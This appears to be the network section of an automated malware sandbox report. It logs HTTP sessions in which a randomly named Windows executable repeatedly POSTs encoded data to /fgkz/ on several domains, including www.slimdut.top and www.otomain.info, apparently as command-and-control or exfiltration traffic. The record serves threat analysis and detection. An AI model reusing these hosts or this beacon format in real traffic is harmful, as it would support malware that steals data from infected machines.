                                Aug 30, 2024 07:19:48.875889063 CEST351OUTGET /fgkz/?nFeHa=dbNpTj&4f2t8=y4FhMh12ATfkFg6tImNw7XoZ6hnl8AB4notnPujEUk+EgZuT0tb2uZJUNE/t4waZuxpptBF/Humi+b09KdNA9iSMBM18JBKWRg== HTTP/1.1
                                Accept: */*
                                Accept-Language: en-us
                                Host: www.gpcamservices.com
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:19:49.859873056 CEST844INHTTP/1.1 404 Not Found
                                Date: Fri, 30 Aug 2024 05:19:49 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Last-Modified: Mon, 01 Mar 2021 17:22:29 GMT
                                Accept-Ranges: bytes
                                Content-Length: 583
                                Vary: Accept-Encoding
                                Content-Type: text/html
                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a [TRUNCATED]
                                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                17192.168.2.54973566.29.154.248805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:19:55.167804956 CEST615OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.slimdut.top
                                Connection: close
                                Content-Length: 186
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.slimdut.top
                                Referer: http://www.slimdut.top/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 7a 6b 32 6e 6d 31 71 61 74 33 69 58 69 70 4e 4e 4b 38 52 68 31 4e 45 7a 71 30 54 2b 6b 59 38 42 66 75 41 56 76 36 74 36 64 31 55 76 62 4b 5a 55 72 6c 46 37 31 43 6d 6f 37 48 74 48 44 65 4d 67 55 44 56 38 47 34 44 67 68 53 54 6a 53 4f 6f 39 75 56 54 68 72 46 43 2f 51 34 67 31 33 6e 51 68 79 71 68 53 4f 74 4f 48 4a 6e 51 6a 77 66 70 78 71 2f 70 73 65 48 71 50 30 52 55 4f 35 51 47 4c 55 32 47 64 47 42 42 47 6e 75 50 76 52 6c 75 74 2f 53 50 4e 30 78 34 73 4e 6c 52 67 6f 72 6c 47 69 5a 4e 71 39 6c 4e 30 76 34 38 39 59 65 34 74 30 41 3d 3d
                                Data Ascii: 4f2t8=zk2nm1qat3iXipNNK8Rh1NEzq0T+kY8BfuAVv6t6d1UvbKZUrlF71Cmo7HtHDeMgUDV8G4DghSTjSOo9uVThrFC/Q4g13nQhyqhSOtOHJnQjwfpxq/pseHqP0RUO5QGLU2GdGBBGnuPvRlut/SPN0x4sNlRgorlGiZNq9lN0v489Ye4t0A==


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                18192.168.2.54973666.29.154.248805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:19:57.700582027 CEST635OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.slimdut.top
                                Connection: close
                                Content-Length: 206
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.slimdut.top
                                Referer: http://www.slimdut.top/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 7a 6b 32 6e 6d 31 71 61 74 33 69 58 67 49 39 4e 4d 66 35 68 30 74 45 79 32 6b 54 2b 71 34 38 4e 66 76 38 56 76 37 5a 71 64 48 77 76 56 50 39 55 71 6b 46 37 38 53 6d 6f 75 33 74 47 4f 2b 4d 2b 55 44 5a 43 47 34 76 67 68 57 44 6a 53 4b 73 39 75 47 72 67 71 56 43 68 62 59 67 33 71 33 51 68 79 71 68 53 4f 74 61 74 4a 6d 30 6a 78 72 74 78 74 75 70 72 43 33 71 4d 2b 78 55 4f 72 67 48 4d 55 32 48 79 47 46 49 4f 6e 74 33 76 52 6c 65 74 2f 44 50 4f 2f 78 34 32 41 46 52 2f 34 61 4d 2b 68 4a 64 47 77 55 63 72 78 4a 67 6f 55 72 55 2b 7a 30 55 6f 45 6d 64 33 62 43 30 33 37 35 59 6c 43 57 48 61 62 33 49 3d
                                Data Ascii: 4f2t8=zk2nm1qat3iXgI9NMf5h0tEy2kT+q48Nfv8Vv7ZqdHwvVP9UqkF78Smou3tGO+M+UDZCG4vghWDjSKs9uGrgqVChbYg3q3QhyqhSOtatJm0jxrtxtuprC3qM+xUOrgHMU2HyGFIOnt3vRlet/DPO/x42AFR/4aM+hJdGwUcrxJgoUrU+z0UoEmd3bC0375YlCWHab3I=


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                19192.168.2.54973766.29.154.248805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:20:00.231659889 CEST1648OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.slimdut.top
                                Connection: close
                                Content-Length: 1218
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.slimdut.top
                                Referer: http://www.slimdut.top/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 7a 6b 32 6e 6d 31 71 61 74 33 69 58 67 49 39 4e 4d 66 35 68 30 74 45 79 32 6b 54 2b 71 34 38 4e 66 76 38 56 76 37 5a 71 64 48 34 76 56 35 68 55 72 47 74 37 6d 53 6d 6f 76 33 74 39 4f 2b 4e 69 55 44 52 34 47 34 54 61 68 55 4c 6a 54 70 30 39 2f 48 72 67 6c 56 43 68 55 34 67 32 33 6e 52 38 79 71 77 5a 4f 74 4b 74 4a 6d 30 6a 78 74 42 78 2b 66 70 72 41 33 71 50 30 52 55 30 35 51 47 72 55 79 72 49 47 46 4d 65 6e 63 58 76 55 31 4f 74 39 78 33 4f 67 42 34 77 4d 6c 51 71 34 61 51 68 68 4a 78 6b 77 56 59 42 78 4b 77 6f 56 4f 6f 6f 71 6c 77 4e 53 32 31 49 51 6a 4a 68 6c 74 6f 50 53 57 76 38 4b 79 4d 74 51 6f 62 6b 68 47 6f 46 4a 39 72 79 63 53 36 4f 73 35 65 6e 4e 58 30 68 76 4d 45 2f 75 39 57 4c 49 54 56 4b 66 35 46 37 51 51 56 47 51 7a 77 63 4f 50 63 6d 4c 32 32 59 70 63 69 5a 72 33 72 72 48 77 65 68 4e 37 51 59 54 69 38 59 4d 45 53 6b 6c 54 37 59 2b 69 39 55 74 43 74 64 65 52 39 7a 2f 65 69 67 71 44 48 54 35 77 75 74 54 6a 44 37 4e 79 47 65 6b 70 43 7a 51 4e 54 47 75 2f 2f 74 6b 63 59 41 [TRUNCATED]
                                Data Ascii: 4f2t8=zk2nm1qat3iXgI9NMf5h0tEy2kT+q48Nfv8Vv7ZqdH4vV5hUrGt7mSmov3t9O+NiUDR4G4TahULjTp09/HrglVChU4g23nR8yqwZOtKtJm0jxtBx+fprA3qP0RU05QGrUyrIGFMencXvU1Ot9x3OgB4wMlQq4aQhhJxkwVYBxKwoVOooqlwNS21IQjJhltoPSWv8KyMtQobkhGoFJ9rycS6Os5enNX0hvME/u9WLITVKf5F7QQVGQzwcOPcmL22YpciZr3rrHwehN7QYTi8YMESklT7Y+i9UtCtdeR9z/eigqDHT5wutTjD7NyGekpCzQNTGu//tkcYAxJHEpjqW4rmiV+IS4uk3JqaTfUMn5c3r3za2UMlDZFf0dGijSW9J07tpLrdO9Rptex4qBV7pB9thCZ92ZqacZ40sDJjU9coD7wTzax7kd2j5Jahxlt4yAetFcKV8/d3eq33Wnwz3x80g2hrKtMQ9YYyMQsYbCqgSF79hoX5hecFSAMNRoL++O7isgXA+HU7pT0PHB80xsKHQ09Cqu3Sri4sS+0ZV+hRFrJdsJuTCJC6VkKW4cHR5csg6Ufq/rjjX1B0ikOZo54MLIpdXk6LE2OC+KWIFDzr2H6ckjukQSjKkxQ5EA2HQoLrJ95UL6969WIJSx25ha2X1EG5YoN3eOR6nmN582sPR/E8z3wXIZh5xGfJj1nvSLIwk6ItbF2uf1pisezuJFqQUYMZU/Syvf2hcajlj/7xl3SCXfZ96v5IOWje9XSXj0CWeiUNTssvouf/IhBdPlumWZydscNN10yagk6S1GVXhpxc6yJjUY0KZIky0GyXmxm1EaW/M8Dv/UYz8WEFyGpYjUkLCTBFsfQfO4PDjSOtAD1hJ6CAt/JvZonYkQ5oiFjwuhXb3M+9NsfxjS6/EqtpMbZkXKtEJra/14hDbCibxOp2qMrleJBMtjmIDDcIgetTeOzr3mRO6bift+CtK6YveQhWuEIgfQdpuS76IPB+1Oa [TRUNCATED]


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                20192.168.2.54973866.29.154.248805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:20:02.919780970 CEST345OUTGET /fgkz/?4f2t8=+meHlBDXvFG0tp5IHuNp5aNfi3jbma4/KPg1jYwxKUxzXvorilFM4RqNjl5oI+tAWQpMLL6Kz03IcJJlzmvukn6IT7E7w1sf4w==&nFeHa=dbNpTj HTTP/1.1
                                Accept: */*
                                Accept-Language: en-us
                                Host: www.slimdut.top
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                21192.168.2.549739104.21.92.135805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:20:29.355699062 CEST618OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.otomain.info
                                Connection: close
                                Content-Length: 186
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.otomain.info
                                Referer: http://www.otomain.info/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 75 6d 68 53 75 49 7a 50 72 74 4b 54 56 79 4d 33 57 66 52 52 58 74 34 2f 53 53 42 42 49 33 46 61 76 5a 69 61 33 48 43 61 59 61 46 43 4f 72 4b 59 42 5a 62 41 52 59 6a 54 6d 56 6a 76 52 39 51 75 42 5a 64 39 75 48 47 4f 49 51 6a 43 62 65 53 47 4a 48 44 34 77 78 31 55 32 47 7a 59 49 58 36 41 71 78 6e 50 63 31 6e 78 71 37 66 53 6f 42 56 53 49 6b 74 57 48 76 52 52 45 4f 47 62 57 55 39 4b 36 4e 79 70 57 49 79 56 57 46 33 5a 66 73 57 59 56 2f 79 4b 6d 57 49 73 66 2f 53 49 58 7a 73 73 52 62 77 34 4d 66 34 33 36 6a 6a 6d 65 55 6f 78 6f 51 3d 3d
                                Data Ascii: 4f2t8=umhSuIzPrtKTVyM3WfRRXt4/SSBBI3FavZia3HCaYaFCOrKYBZbARYjTmVjvR9QuBZd9uHGOIQjCbeSGJHD4wx1U2GzYIX6AqxnPc1nxq7fSoBVSIktWHvRREOGbWU9K6NypWIyVWF3ZfsWYV/yKmWIsf/SIXzssRbw4Mf436jjmeUoxoQ==
                                Aug 30, 2024 07:20:30.204194069 CEST1236INHTTP/1.1 403 Forbidden
                                Date: Fri, 30 Aug 2024 05:20:30 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                X-Frame-Options: SAMEORIGIN
                                Referrer-Policy: same-origin
                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ts2nI1Oby4%2FtQ4omscmXl732VVJHxcLU6pMCmLXJXnzzcRhTvv9hoCaNNRsC4sOFvYvOF1U%2F9aYZFU0WKuqgDJddEPsrVtzM%2FVDQbxmf%2FwgvKcErBIWz6mvlZbgPkHkQ7SFT"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Vary: Accept-Encoding
                                alt-svc: h3=":443"; ma=86400
                                CF-Cache-Status: DYNAMIC
                                Server: cloudflare
                                CF-RAY: 8bb254fa1ccc7c9c-EWR
                                Content-Encoding: gzip
                                Data Raw: 38 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 6b 6f 1b 37 16 fd ae 5f 71 c3 05 54 09 10 35 92 2c c7 ae 34 9a a0 eb 78 51 ef a6 89 51 3b 68 83 a2 30 38 c3 3b 1a c6 14 39 25 29 c9 42 ea ff be e0 3c e4 d1 c3 6e 82 c5 a2 fe 60 0d 5f 97 f7 71 78 79 78 c3 57 6f 3f 5c dc 7e ba be 84 cc 2d 64 d4 0a 5f 51 fa 9b 48 41 3a b8 ba 84 b3 df 23 08 fd 00 24 92 59 3b 23 4a d3 cf 16 04 be 06 2d b9 40 02 92 a9 f9 8c a0 a2 1f 6f 48 04 e1 ab df 50 71 91 fe 4e e9 93 a8 4a 0e c0 71 51 67 df 26 ea fc 05 51 e7 df 20 6a ee 2a 69 be e3 98 95 87 52 28 dd 95 94 21 e3 51 2b 74 c2 49 8c de be bf 81 5c 0b e5 2c 38 0d b9 d1 99 88 85 43 0e 57 d7 f0 27 ac d7 eb be 76 7a c1 84 ea 0b 95 6a f8 13 2e a4 5e f2 54 32 83 61 50 8a 68 85 0b 74 0c 92 8c 19 8b 6e 46 3e de fe 8b 9e 13 08 ea 81 cc b9 9c e2 1f 4b b1 9a 91 0b ad 1c 2a 47 6f 37 39 12 48 ca d6 8c 38 7c 70 81 37 65 ba 15 f3 92 94 5f e9 c7 1f e8 85 5e e4 cc 89 58 36 05 5d 5d ce 2e f9 1c 1b eb 14 5b e0 8c 18 1d 6b 67 1b 13 95 16 8a e3 43 0f 94 4e b5 94 7a 7d b0 64 25 70 9d 6b e3 1a [TRUNCATED]
                                Data Ascii: 88cXko7_qT5,4xQQ;h08;9%)B<n`_qxyxWo?\~-d_QHA:#$Y;#J-@oHPqNJqQg&Q j*iR(!Q+tI\,8CW'vzj.^T2aPhtnF>K*Go79H8|p7e_^X6]].[kgCNz}d%pklq%E'pIj&q6,H6m>#IzWvZtF+EP jZM
                                Aug 30, 2024 07:20:30.204216957 CEST1236INData Raw: 8c c8 5d d4 ea a4 4b 95 38 a1 55 a7 fb 45 a4 1d ae 93 e5 02 95 eb 33 ce 2f 57 a8 dc 3b 61 1d 2a 34 ed f6 5a 28 ae d7 fd 5f 7f 7a f7 a3 73 f9 cf f8 c7 12 ad 6b b7 ff 7d f3 e1 7d f9 bf 6f 9d 11 6a 2e d2 4d f7 cb 8a 19 c0 d9 56 36 2b 7b 92 d9 56 fe
                                Data Ascii: ]K8UE3/W;a*4Z(_zsk}}oj.MV6+{VD4F"%.7$IZ3kUtf_4!HH^nt/q2e.Vhj2||}7G<$l~s?"Xb{}RGdMg=\yV)
                                Aug 30, 2024 07:20:30.204227924 CEST570INData Raw: 0e 0d 2d f2 fe 2e 35 f1 7f bf 30 5b c6 ab 38 f3 15 a7 7f f3 94 b2 4b ba 57 cb 8a b5 f1 74 a0 fc a1 56 4b c1 21 9e d3 75 e6 73 44 92 d2 7a f6 d2 58 6d 68 91 a5 d1 c0 42 d2 31 e4 0f fe df 86 8e c0 e8 a5 f2 d4 b6 d0 fd 18 11 05 b7 c9 71 46 ca 1e 12
                                Data Ascii: -.50[8KWtVK!usDzXmhB1qF}Be#Sz_zW}|x'SyzNRG|%$p|]LWd~hJLa'5%I+p{.<?6oQrBZr4 -


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                22192.168.2.549740104.21.92.135805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:20:31.889008045 CEST638OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.otomain.info
                                Connection: close
                                Content-Length: 206
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.otomain.info
                                Referer: http://www.otomain.info/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 75 6d 68 53 75 49 7a 50 72 74 4b 54 61 79 51 33 51 2b 52 52 51 4e 34 34 4f 43 42 42 47 58 45 79 76 59 65 61 33 46 75 4b 59 6f 68 43 4f 4b 36 59 41 64 76 41 57 59 6a 54 2f 6c 6a 71 56 39 52 67 42 5a 52 54 75 47 36 4f 49 52 48 43 62 63 4b 47 4f 30 72 37 68 78 31 42 2b 6d 7a 65 4d 58 36 41 71 78 6e 50 63 31 79 55 71 37 48 53 70 78 6c 53 4a 46 74 56 62 66 52 53 44 4f 47 62 53 55 38 44 36 4e 79 66 57 4d 36 37 57 41 72 5a 66 70 79 59 56 74 61 4a 76 57 49 75 53 66 54 73 61 43 56 46 56 39 30 42 44 63 6f 38 6a 44 4b 4a 62 42 45 69 76 6c 4a 2f 56 71 32 70 6c 78 48 6a 6c 4d 7a 36 46 72 57 63 32 7a 38 3d
                                Data Ascii: 4f2t8=umhSuIzPrtKTayQ3Q+RRQN44OCBBGXEyvYea3FuKYohCOK6YAdvAWYjT/ljqV9RgBZRTuG6OIRHCbcKGO0r7hx1B+mzeMX6AqxnPc1yUq7HSpxlSJFtVbfRSDOGbSU8D6NyfWM67WArZfpyYVtaJvWIuSfTsaCVFV90BDco8jDKJbBEivlJ/Vq2plxHjlMz6FrWc2z8=
                                Aug 30, 2024 07:20:32.559743881 CEST1236INHTTP/1.1 403 Forbidden
                                Date: Fri, 30 Aug 2024 05:20:32 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                X-Frame-Options: SAMEORIGIN
                                Referrer-Policy: same-origin
                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DdYoLHquPxfvO8Xz9kVUebCgSzPF32K607u1mB7TGBaQBmT1uTzn1nOuHC0ro6oVE1NZ7srYw%2Bskcw8FZ4T3sAVZuQsqmHPqFPN4t3KgGMytwH6YYkHvNtE3kl52t12ZidTA"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Vary: Accept-Encoding
                                alt-svc: h3=":443"; ma=86400
                                CF-Cache-Status: DYNAMIC
                                Server: cloudflare
                                CF-RAY: 8bb25509fbf57cab-EWR
                                Content-Encoding: gzip
                                Data Raw: 38 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 6b 6f 1b 37 16 fd ae 5f 71 c3 05 54 09 10 35 92 2c c7 8e 34 9a a2 eb 78 51 ef a6 89 51 3b 68 83 a2 30 38 c3 3b 12 63 0e 39 25 29 c9 42 ea ff be e0 3c e4 d1 c3 6e 82 c5 a2 fe 60 0d 5f 97 f7 71 78 79 78 c3 57 6f 3f 5c dc 7e ba be 84 85 cb 64 d4 0a 5f 51 fa 9b 48 41 3a b8 ba 84 b3 df 23 08 fd 00 24 92 59 3b 23 4a d3 cf 16 04 be 06 2d b9 40 02 92 a9 f9 8c a0 a2 1f 6f 48 04 e1 ab df 50 71 91 fe 4e e9 93 a8 4a 0e c0 71 51 67 df 26 ea fc 05 51 e7 df 20 6a ee 2a 69 be e3 98 95 87 52 28 dd 95 b4 40 c6 a3 56 e8 84 93 18 bd 7d 7f 03 b9 16 ca 59 70 1a 72 a3 17 22 16 0e 39 5c 5d c3 9f b0 5e af fb da e9 8c 09 d5 17 2a d5 f0 27 5c 48 bd e4 a9 64 06 c3 a0 14 d1 0a 33 74 0c 92 05 33 16 dd 8c 7c bc fd 17 3d 27 10 d4 03 0b e7 72 8a 7f 2c c5 6a 46 2e b4 72 a8 1c bd dd e4 48 20 29 5b 33 e2 f0 c1 05 de 94 e9 56 cc 4b 52 7e a5 1f 7f a0 17 3a cb 99 13 b1 6c 0a ba ba 9c 5d f2 39 36 d6 29 96 e1 8c 18 1d 6b 67 1b 13 95 16 8a e3 43 0f 94 4e b5 94 7a 7d b0 64 25 70 9d 6b e3 1a [TRUNCATED]
                                Data Ascii: 88dXko7_qT5,4xQQ;h08;c9%)B<n`_qxyxWo?\~d_QHA:#$Y;#J-@oHPqNJqQg&Q j*iR(@V}Ypr"9\]^*'\Hd3t3|='r,jF.rH )[3VKR~:l]96)kgCNz}d%pkJ$HFO(&LlXJBA9#m$# $]Ek,3$\d.r((]QmbDV'
                                Aug 30, 2024 07:20:32.559762001 CEST1236INData Raw: 5d aa c4 09 ad 3a dd 2f 22 ed 70 9d 2c 33 54 ae cf 38 bf 5c a1 72 ef 84 75 a8 d0 b4 db 6b a1 b8 5e f7 7f fd e9 dd 8f ce e5 3f e3 1f 4b b4 ae dd fe f7 cd 87 f7 e5 ff be 75 46 a8 b9 48 37 dd 2f 2b 66 00 67 5b d9 ac ec 49 66 5b f9 73 74 97 12 fd e7
                                Data Ascii: ]:/"p,3T8\ruk^?KuFH7/+fg[If[st?7WCmhcS4+n$AkIaW)}Ao+ "GNz9'NR/4p0(t)'BcV4U\%=qd'A`sf^-`5Iw-Jq4]s)}|Z=I
                                Aug 30, 2024 07:20:32.559772968 CEST565INData Raw: bb d4 c4 ff fd c2 6c 19 af e2 cc 57 9c fe fb a7 94 5d d2 bd 5a 56 ac 8d a7 03 e5 0f b5 5a 0a 0e f1 9c ae 17 3e 47 24 29 ad 67 2f 8d d5 86 16 59 1a 0d 64 92 8e 21 7f f0 ff 36 74 04 46 2f 95 a7 b6 85 ee c7 88 28 b8 4d 8e 33 52 f6 90 e8 13 da 30 28
                                Data Ascii: lW]ZVZ>G$)g/Yd!6tF/(M3R0(zjW0cX>]0u_7^W$uk[WBw7lo"cESb_6vO%6<-IZLYy~8lP*K=LZr4 -`1g9


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                23192.168.2.549741104.21.92.135805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:20:34.419315100 CEST1651OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.otomain.info
                                Connection: close
                                Content-Length: 1218
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.otomain.info
                                Referer: http://www.otomain.info/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 75 6d 68 53 75 49 7a 50 72 74 4b 54 61 79 51 33 51 2b 52 52 51 4e 34 34 4f 43 42 42 47 58 45 79 76 59 65 61 33 46 75 4b 59 6f 70 43 4f 59 43 59 42 36 7a 41 58 59 6a 54 33 46 6a 72 56 39 51 38 42 61 68 58 75 47 32 65 49 53 76 43 42 35 57 47 4c 46 72 37 6f 78 31 42 38 6d 7a 66 49 58 36 5a 71 78 33 4c 63 31 69 55 71 37 48 53 70 79 39 53 4e 55 74 56 5a 66 52 52 45 4f 48 55 57 55 38 72 36 4e 36 50 57 4d 2f 4f 44 6b 6e 5a 66 49 4f 59 54 59 75 4a 67 57 49 6f 58 66 54 30 61 44 70 65 56 37 52 34 44 66 31 68 6a 42 71 4a 59 6c 41 35 38 55 56 4a 50 72 57 6e 67 56 48 54 34 73 2b 32 66 34 33 5a 68 55 42 4b 53 5a 49 75 38 6e 52 6a 50 4f 46 47 55 31 68 50 35 6a 59 6f 68 58 65 70 45 47 46 4a 31 51 38 62 6c 64 45 42 6d 6a 4a 2b 32 72 38 39 73 38 43 4a 50 75 74 70 57 6e 46 37 64 38 63 76 38 6e 37 50 37 6e 43 47 4d 36 65 6c 2b 68 38 66 7a 75 2f 63 53 51 48 39 2b 66 50 59 42 79 31 55 66 52 36 6d 66 34 79 58 59 44 64 4f 78 35 55 39 73 46 44 39 4d 75 5a 79 73 66 4a 6d 44 32 4a 4f 72 68 34 30 71 49 55 5a [TRUNCATED]
                                Data Ascii: 4f2t8=umhSuIzPrtKTayQ3Q+RRQN44OCBBGXEyvYea3FuKYopCOYCYB6zAXYjT3FjrV9Q8BahXuG2eISvCB5WGLFr7ox1B8mzfIX6Zqx3Lc1iUq7HSpy9SNUtVZfRREOHUWU8r6N6PWM/ODknZfIOYTYuJgWIoXfT0aDpeV7R4Df1hjBqJYlA58UVJPrWngVHT4s+2f43ZhUBKSZIu8nRjPOFGU1hP5jYohXepEGFJ1Q8bldEBmjJ+2r89s8CJPutpWnF7d8cv8n7P7nCGM6el+h8fzu/cSQH9+fPYBy1UfR6mf4yXYDdOx5U9sFD9MuZysfJmD2JOrh40qIUZZwGVE3erFJ8jvtIzr8Eiz0KJ24pxu+yWOCLt/ZsXYJGXUJgUYa6Z2MTCxMXzGhMptVwpym8VBuy8En2rO82+Mc/Kqij93i1PHS76Tb91JbeHKiDGbIWsNP6BU50IVkFUca6msFvU6AqdRib5L0bPyhumxpQ8lP4hXdAybclcJ8zicShwDs0XVfUIGHnReBsEbsQNBrcmK8yftQE/J3If+r6xsbcqEikqvFXwcF1MSR+AvOE+NMV4W/MwARJg1erVZ/mPG/FGZnrL5PrMz/bUX44vy2pxpyAXK6vu8WuvChxgkLQI/RNz2qC3YZmHH8FuQ6XXE5hoHXm6Y8GXRENo8pbu200Jusi47Noyx3pbXmExpkAE8/o4GJvfl6wUvfpaCnEQdy7m40elbRyIE0tPfFmjExpMKyhwVhQlDnHX1Uah9jnJAMqgldwVd5Jfh7P8T9HSYtavrx7mlCiDCSJ0GH